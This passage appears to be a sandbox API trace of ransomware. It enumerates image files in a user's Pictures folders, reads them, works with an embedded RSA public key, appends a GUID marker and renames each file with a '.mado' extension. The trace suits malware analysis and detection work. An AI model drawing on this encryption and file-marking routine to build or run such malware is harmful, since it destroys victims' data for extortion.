(HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\") returned="hJg26t0YFz\\" [0206.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\") returned="941Y-ufnAszYHOsd\\" [0206.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0206.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0206.415] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.415] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.415] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.415] PathFindFileNameW (pszPath="") returned="" [0206.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418dbd80, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x7b9a7880, ftLastAccessTime.dwHighDateTime=0x1d5e089, ftLastWriteTime.dwLowDateTime=0x7b9a7880, ftLastWriteTime.dwHighDateTime=0x1d5e089, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.417] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418dbd80, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x7b9a7880, ftLastAccessTime.dwHighDateTime=0x1d5e089, ftLastWriteTime.dwLowDateTime=0x7b9a7880, ftLastWriteTime.dwHighDateTime=0x1d5e089, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.417] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c94c10, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x543b9f80, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0x543b9f80, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x75b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2S jL lPm.bmp", cAlternateFileName="2SJLLP~1.BMP")) returned 1 [0206.417] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\2S jL lPm.bmp") returned=".bmp" [0206.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\2S jL lPm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\2s jl lpm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.418] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30128) returned 1 [0206.418] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.420] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x758a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.420] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.422] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x75b0, lpOverlapped=0x0) returned 1 [0206.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.423] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.424] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.424] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.424] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.424] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.424] GetLastError () returned 0x0 [0206.424] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.424] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.424] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.424] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.424] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.424] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.425] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x75b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.425] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.425] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.425] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.425] CloseHandle (hObject=0x63c) returned 1 [0206.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.426] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\2S jL lPm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\2s jl lpm.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\2S jL lPm.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\2s jl lpm.bmp.mado")) returned 1 [0206.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.427] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b673c0 | out: hHeap=0x2c0000) returned 1 [0206.428] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecc0d00, ftCreationTime.dwHighDateTime=0x1d5d7af, ftLastAccessTime.dwLowDateTime=0x463aaa90, ftLastAccessTime.dwHighDateTime=0x1d5e3c5, ftLastWriteTime.dwLowDateTime=0x463aaa90, ftLastWriteTime.dwHighDateTime=0x1d5e3c5, nFileSizeHigh=0x0, nFileSizeLow=0x16e66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdCQch.gif", cAlternateFileName="")) returned 1 [0206.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b67078 [0206.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.428] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\AdCQch.gif") returned=".gif" [0206.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\AdCQch.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\adcqch.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.429] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=93798) returned 1 [0206.429] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.431] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16e40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.431] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.433] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.433] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16e66, lpOverlapped=0x0) returned 1 [0206.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.434] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.435] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.435] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.435] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.435] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.435] GetLastError () returned 0x0 [0206.435] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.435] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.435] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.435] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.435] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16e70) returned 0x3b87c98 [0206.436] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86f80 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86fc8 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bd8 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c08 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c50 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c20 [0206.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b816a8 [0206.437] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b816a8, Size=0x218) returned 0x3b7c6a8 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c08 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c20 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c50 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c50 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79c20 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79c08 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b67190 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b672a8 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c20 | out: hHeap=0x2c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c08 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c50 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.438] GetCurrentThreadId () returned 0x600 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7acc8 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.438] GetCurrentThreadId () returned 0x600 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.439] HeapFree (in: 